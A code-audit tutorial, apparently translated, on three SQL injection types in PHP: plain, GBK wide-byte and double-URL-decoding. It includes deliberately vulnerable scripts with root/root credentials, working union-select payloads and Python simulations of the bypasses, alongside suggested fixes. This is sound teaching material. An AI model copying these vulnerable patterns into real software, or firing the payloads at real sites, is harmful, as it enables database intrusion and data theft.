Plain injection

<?php
header('content-type: text/html; charset=utf-8');
$id = $_GET['id'];                 // untrusted input, used without any escaping
$conn = mysqli_connect('localhost', 'root', 'root', 'test');
if (!$conn) {
	die('Database connection failed: ' . mysqli_connect_error());
}
// Vulnerable on purpose: $id is interpolated straight into the statement, so
// ?id=1 union select 1,2,3 is executed as SQL.
$sql = "select * from user where id={$id}";
$result = $conn->query($sql);
var_dump('Current SQL statement: ' . $sql . "<br />");
@print_r(mysqli_fetch_row($result));

Wide-byte injection

Under GBK a character is two bytes, so the server merges pairs of bytes into one Chinese character. addslashes() puts a backslash (0x5c) in front of the attacker's quote; when that backslash is preceded by a lead byte such as 0xdf, the pair 0xdf 0x5c is read as a single GBK character, the backslash disappears and the bare quote closes the SQL string literal. The usual fix is to set the connection charset with mysqli_set_charset($conn, 'gbk') instead of a raw "set names" query (so that escaping is charset-aware) and to use prepared statements rather than string interpolation.

Example: http://localhost/audit/sql1.php?id=%df%27%20union%20select%201,2%20--+

<?php
header("Content-type:text/html;charset=gbk");
$conn = mysqli_connect('localhost', 'root', 'root', 'test');
if (!$conn) {
	die('Database connection failed: ' . mysqli_connect_error());
}
// Tells the server the connection uses GBK, but the client-side escaping
// below still works byte by byte (mysqli_set_charset would be the safe call).
$conn->query("set names 'gbk'");
// addslashes() inserts 0x5c before the quote; with %df in front of it the
// server reads 0xdf 0x5c as one character and the quote is left unescaped.
$id = addslashes($_GET['id']);
$sql = "select * from abc where id='$id'";
$result = $conn->query($sql);
var_dump('Current SQL: ' . $sql . "<br/>");
@print_r(mysqli_fetch_row($result));
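The byte-level mechanics of the wide-byte bypass, as an added example that is not part of the original page: it simulates the script above in Python, using a byte-for-byte port of addslashes() (the function names and the helper functions are mine; the payload is the one from the example URL) and then decodes the resulting statement the way a server configured for GBK would, next to a single-byte decoding for comparison.

```python
# Added example (not from the original page): a byte-level simulation of the
# page's sql1.php to show why addslashes() fails once the server speaks GBK.
from urllib.parse import unquote_to_bytes

# Payload taken from the page's example URL; the web server decodes it once.
PAYLOAD = "%df%27%20union%20select%201,2%20--+"


def addslashes(data: bytes) -> bytes:
    """Byte-for-byte port of PHP addslashes(): prefix ' " \\ and NUL with 0x5c."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def raw_get_id(query_string_value: str) -> bytes:
    """What $_GET['id'] holds: one round of URL decoding, with '+' meaning space."""
    return unquote_to_bytes(query_string_value).replace(b"+", b" ")


def build_query(raw_id: bytes) -> bytes:
    """Mirror of the page's script: addslashes(), then interpolate into '...'."""
    return b"select * from abc where id='" + addslashes(raw_id) + b"'"


def decode_as_server(query: bytes, charset: str) -> str:
    """The statement as MySQL reads the bytes after `set names <charset>`."""
    return query.decode(charset)


def literal_closed_early(query: bytes, charset: str) -> bool:
    """True if, once the server has decoded the bytes, the attacker's quote is
    not preceded by a backslash, i.e. the string literal ends at that quote."""
    text = decode_as_server(query, charset)
    i = text.index("' union")
    return text[i - 1] != "\\"


if __name__ == "__main__":
    q = build_query(raw_get_id(PAYLOAD))
    print(q)
    # Under GBK the bytes 0xdf 0x5c collapse into one character and the quote is bare;
    # under a single-byte charset the backslash survives and the quote stays escaped.
    print("gbk  :", decode_as_server(q, "gbk"))
    print("closes literal under gbk:", literal_closed_early(q, "gbk"),
          "| under latin-1:", literal_closed_early(q, "latin-1"))
```

Decoding is done with Python's codecs rather than a live MySQL server, so it shows the character-boundary problem only; whether the UNION then returns data still depends on the table the page queries.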

Second-order injection (double URL decoding)

This form of second-order injection bypasses GPC-style escaping (magic_quotes_gpc or addslashes()) because the script calls urldecode() after the escaping has already run. The web server decodes the query string once when it fills $_GET, turning %25 into % so that %2527 becomes %27; addslashes() sees no quote and changes nothing; the script's own urldecode() then turns %27 into a single quote that was never escaped.

<?php
header('content-type: text/html; charset=utf-8');
// addslashes() only escapes a quote that is already present in $_GET['id'].
$id = addslashes($_GET['id']);
// The second decode turns %27 (sent as %2527) into a quote that was never escaped.
$id2 = urldecode($id);
$conn = mysqli_connect('localhost', 'root', 'root', 'test');
if (!$conn) {
	die('Database connection failed: ' . mysqli_connect_error());
}
$sql = "select * from user where id={$id2}";
$result = $conn->query($sql);
var_dump('Current SQL statement: ' . $sql . "<br />");
@print_r(mysqli_fetch_row($result));
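The decode-escape-decode sequence played through end to end, as an added example that is not part of the original page: a Python simulation of the script above (my own function names; the two payloads are constructed for the demonstration) that feeds the same `1 or 'a'='a` payload in once URL-encoded and with its quotes encoded twice, and reports whether the quotes in the final statement are still escaped.

```python
# Added example (not from the original page): string-level simulation of the
# page's third script to show why urldecode() after addslashes() reopens the hole.
from urllib.parse import unquote_plus


def addslashes(s: str) -> str:
    """PHP addslashes() equivalent: backslash-escape ' " \\ and NUL."""
    return "".join("\\" + c if c in "'\"\\\x00" else c for c in s)


def build_query(query_string_value: str) -> str:
    """Mirror of the page's script: $_GET decoding, addslashes(), then urldecode()."""
    from_get = unquote_plus(query_string_value)  # PHP decodes the query string once for $_GET
    escaped = addslashes(from_get)               # the intended protection (same effect as magic_quotes_gpc)
    decoded_again = unquote_plus(escaped)        # the second, hand-written urldecode()
    return f"select * from user where id={decoded_again}"


def quotes_escaped(sql: str) -> bool:
    """True when every single quote in the statement is preceded by a backslash."""
    return all(i > 0 and sql[i - 1] == "\\" for i, c in enumerate(sql) if c == "'")


# Constructed payloads: `1 or 'a'='a`, encoded once and with the quotes encoded twice.
SINGLE_ENCODED = "1%20or%20%27a%27%3d%27a"
DOUBLE_ENCODED = "1%20or%20%2527a%2527%3d%2527a"

if __name__ == "__main__":
    for label, value in (("once", SINGLE_ENCODED), ("twice", DOUBLE_ENCODED)):
        sql = build_query(value)
        print(f"encoded {label:5} -> {sql}  (quotes escaped: {quotes_escaped(sql)})")
```

unquote_plus is used for both decoding steps because PHP's query-string parsing and urldecode() both turn '+' into a space; plain unquote would not.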